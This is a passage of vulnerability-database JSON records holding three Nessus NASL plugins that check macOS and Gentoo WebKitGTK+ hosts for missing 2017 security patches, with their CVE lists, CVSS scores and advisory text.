- AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:apple:macos"], "id": "MACOS_10_12_4.NASL", "href": "https://www.tenable.com/plugins/nessus/99134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99134);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-3619\",\n \"CVE-2016-4688\",\n \"CVE-2016-5387\",\n \"CVE-2016-5636\",\n \"CVE-2016-7056\",\n \"CVE-2016-7585\",\n \"CVE-2016-7922\",\n \"CVE-2016-7923\",\n \"CVE-2016-7924\",\n \"CVE-2016-7925\",\n \"CVE-2016-7926\",\n \"CVE-2016-7927\",\n \"CVE-2016-7928\",\n \"CVE-2016-7929\",\n \"CVE-2016-7930\",\n \"CVE-2016-7931\",\n \"CVE-2016-7932\",\n \"CVE-2016-7933\",\n \"CVE-2016-7934\",\n \"CVE-2016-7935\",\n \"CVE-2016-7936\",\n \"CVE-2016-7937\",\n \"CVE-2016-7938\",\n \"CVE-2016-7939\",\n \"CVE-2016-7940\",\n \"CVE-2016-7973\",\n \"CVE-2016-7974\",\n \"CVE-2016-7975\",\n \"CVE-2016-7983\",\n \"CVE-2016-7984\",\n \"CVE-2016-7985\",\n \"CVE-2016-7986\",\n \"CVE-2016-7992\",\n \"CVE-2016-7993\",\n \"CVE-2016-8574\",\n \"CVE-2016-8575\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2016-9533\",\n \"CVE-2016-9535\",\n \"CVE-2016-9536\",\n \"CVE-2016-9537\",\n \"CVE-2016-9538\",\n \"CVE-2016-9539\",\n \"CVE-2016-9540\",\n \"CVE-2016-9586\",\n \"CVE-2016-9935\",\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10160\",\n \"CVE-2016-10161\",\n \"CVE-2017-2379\",\n \"CVE-2017-2381\",\n \"CVE-2017-2388\",\n \"CVE-2017-2390\",\n \"CVE-2017-2398\",\n \"CVE-2017-2401\",\n \"CVE-2017-2402\",\n \"CVE-2017-2403\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2408\",\n \"CVE-2017-2409\",\n \"CVE-2017-2410\",\n \"CVE-2017-2413\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2418\",\n \"CVE-2017-2420\",\n \"CVE-2017-2421\",\n \"CVE-2017-2422\",\n \"CVE-2017-2423\",\n \"CVE-2017-2425\",\n \"CVE-2017-2426\",\n \"CVE-2017-2427\",\n \"CVE-2017-2428\",\n \"CVE-2017-2429\",\n \"CVE-2017-2430\",\n \"CVE-2017-2431\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2436\",\n \"CVE-2017-2437\",\n \"CVE-2017-2438\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2443\",\n \"CVE-2017-2448\",\n \"CVE-2017-2449\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2467\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2477\",\n \"CVE-2017-2478\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2489\",\n \"CVE-2017-2490\",\n \"CVE-2017-5029\",\n \"CVE-2017-5202\",\n \"CVE-2017-5203\",\n \"CVE-2017-5204\",\n \"CVE-2017-5205\",\n \"CVE-2017-5341\",\n \"CVE-2017-5342\",\n \"CVE-2017-5482\",\n \"CVE-2017-5483\",\n \"CVE-2017-5484\",\n \"CVE-2017-5485\",\n \"CVE-2017-5486\",\n \"CVE-2017-6974\",\n \"CVE-2017-7070\"\n );\n script_bugtraq_id(\n 85919,\n 91247,\n 91816,\n 94572,\n 94650,\n 94742,\n 94744,\n 94745,\n 94746,\n 94747,\n 94753,\n 94754,\n 94846,\n 94968,\n 94972,\n 94975,\n 94977,\n 95019,\n 95076,\n 95077,\n 95078,\n 95375,\n 95764,\n 95768,\n 95774,\n 95783,\n 95852,\n 96767,\n 97132,\n 97134,\n 97137,\n 97140,\n 97146,\n 97147,\n 97300,\n 97301,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version of macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS that is 10.12.x prior to\n10.12.4. It is, therefore, affected by multiple vulnerabilities in\nmultiple components, some of which are remote code execution\nvulnerabilities. An unauthenticated, remote attacker can exploit these\nremote code execution vulnerabilities by convincing a user to visit a\nspecially crafted website, resulting in the execution of arbitrary\ncode in the context of the current user. The affected components are\nas follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nif (version !~ \"^10\\.12($|[^0-9])\") audit(AUDIT_OS_NOT, \"Mac OS 10.12.x\");\n\nfixed_version = \"10.12.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n xss:TRUE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:36", "description": "The remote host is affected by the vulnerability described in GLSA-201706-15 (WebKitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attack can use multiple vectors to execute arbitrary code or cause a denial of service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2330", "CVE-2015-7096", "CVE-2015-7098", "CVE-2016-1723", "CVE-2016-1724", "CVE-2016-1725", "CVE-2016-1726", "CVE-2016-1727", "CVE-2016-1728", "CVE-2016-4692", "CVE-2016-4743", "CVE-2016-7586", "CVE-2016-7587", "CVE-2016-7589", "CVE-2016-7592", "CVE-2016-7598", "CVE-2016-7599", "CVE-2016-7610", "CVE-2016-7611", "CVE-2016-7623", "CVE-2016-7632", "CVE-2016-7635", "CVE-2016-7639", "CVE-2016-7640", "CVE-2016-7641", "CVE-2016-7642", "CVE-2016-7645", "CVE-2016-7646", "CVE-2016-7648", "CVE-2016-7649", "CVE-2016-7652", "CVE-2016-7654", "CVE-2016-7656", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2350", "CVE-2017-2354", "CVE-2017-2355", "CVE-2017-2356", "CVE-2017-2362", "CVE-2017-2363", "CVE-2017-2364", "CVE-2017-2365", "CVE-2017-2366", "CVE-2017-2367", "CVE-2017-2369", "CVE-2017-2371", "CVE-2017-2373", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2496", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2510", "CVE-2017-2514", "CVE-2017-2515", "CVE-2017-2521", "CVE-2017-2525", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2539", "CVE-2017-2544", "CVE-2017-2547", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201706-15.NASL", "href": "https://www.tenable.com/plugins/nessus/100675", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201706-15.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100675);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-2330\", \"CVE-2015-7096\", \"CVE-2015-7098\", \"CVE-2016-1723\", \"CVE-2016-1724\", \"CVE-2016-1725\", \"CVE-2016-1726\", \"CVE-2016-1727\", \"CVE-2016-1728\", \"CVE-2016-4692\", \"CVE-2016-4743\", \"CVE-2016-7586\", \"CVE-2016-7587\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7598\", \"CVE-2016-7599\", \"CVE-2016-7610\", \"CVE-2016-7611\", \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\", \"CVE-2016-7640\", \"CVE-2016-7641\", \"CVE-2016-7642\", \"CVE-2016-7645\", \"CVE-2016-7646\", \"CVE-2016-7648\", \"CVE-2016-7649\", \"CVE-2016-7652\", \"CVE-2016-7654\", \"CVE-2016-7656\", \"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\", \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\", \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2367\", \"CVE-2017-2369\", \"CVE-2017-2371\", \"CVE-2017-2373\", \"CVE-2017-2376\", \"CVE-2017-2377\", \"CVE-2017-2386\", \"CVE-2017-2392\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\", \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\", \"CVE-2017-2447\", \"CVE-2017-2454\", \"CVE-2017-2455\", \"CVE-2017-2457\", \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2464\", \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\", \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\", \"CVE-2017-2481\", \"CVE-2017-2496\", \"CVE-2017-2504\", \"CVE-2017-2505\", \"CVE-2017-2506\", \"CVE-2017-2508\", \"CVE-2017-2510\", \"CVE-2017-2514\", \"CVE-2017-2515\", \"CVE-2017-2521\", \"CVE-2017-2525\", \"CVE-2017-2526\", \"CVE-2017-2528\", \"CVE-2017-2530\", \"CVE-2017-2531\", \"CVE-2017-2536\", \"CVE-2017-2539\", \"CVE-2017-2544\", \"CVE-2017-2547\", \"CVE-2017-2549\", \"CVE-2017-6980\", \"CVE-2017-6984\");\n script_xref(name:\"GLSA\", value:\"201706-15\");\n\n script_name(english:\"GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201706-15\n(WebKitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attack can use multiple vectors to execute arbitrary code or\n cause a denial of service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201706-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.16.3:4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.16.3\"), vulnerable:make_list(\"lt 2.16.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-12T16:43:38", "description": "The remote host is running a version of Mac OS X 10.10.5 or 10.11.6 that is missing a security update. It is therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the LibreSSL component due to a flaw in the ECDSA implementation that is triggered when not properly setting a flag in ECDSA signing nonces to indicate that only constant-time code paths should be followed. An unauthenticated, remote attacker can exploit this to conduct side-channel cache-timing attacks, allowing the attacker to recover the modular inversion state sequences and the ECDSA private keys. Note that this vulnerability does not affect Mac OS X 10.10.5.\n (CVE-2016-7056)\n\n - An integer overflow condition exists in the ImageIO component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted JPEG file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2432)\n\n - Multiple memory corruption issues exist in the libxslt component that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2477)\n\n - An integer overflow condition exists in the libxslt component in the xsltAddTextString() function in transform.c. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted file, to cause an out-of-bounds write, potentially allowing the execution of arbitrary code.\n (CVE-2017-5029)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2017-001", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4688", "CVE-2016-7056", "CVE-2017-2432", "CVE-2017-2477", "CVE-2017-5029"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2017-001.NASL", "href": "https://www.tenable.com/plugins/nessus/99135", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99135);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2016-4688\",\n \"CVE-2016-7056\",\n \"CVE-2017-2432\",\n \"CVE-2017-2477\",\n \"CVE-2017-5029\"\n );\n script_bugtraq_id(\n 94572,\n 95375,\n 96767,\n 97137,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2017-001\");\n script_summary(english:\"Checks for the presence of Security Update 2017-001.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.10.5 or 10.11.6\nthat is missing a security update. It is therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n LibreSSL component due to a flaw in the ECDSA\n implementation that is triggered when not properly\n setting a flag in ECDSA signing nonces to indicate that\n only constant-time code paths should be followed. An\n unauthenticated, remote attacker can exploit this to\n conduct side-channel cache-timing attacks, allowing the\n attacker to recover the modular inversion state\n sequences and the ECDSA private keys. Note that this\n vulnerability does not affect Mac OS X 10.10.5.\n (CVE-2016-7056)\n\n - An integer overflow condition exists in the ImageIO\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n JPEG file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2432)\n\n - Multiple memory corruption issues exist in the libxslt\n component that allow an unauthenticated, remote attacker\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2477)\n\n - An integer overflow condition exists in the libxslt\n component in the xsltAddTextString() function in\n transform.c. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to cause an out-of-bounds write,\n potentially allowing the execution of arbitrary code.\n (CVE-2017-5029)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-001 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(10\\.5|11\\.6)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.10.5 or Mac OS X 10.11.6\");\n\nif ( \"10.10.5\" >< os) patch = \"2017-001\";\nelse if ( \"10.11.6\" >< os ) patch = \"2017-001\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = 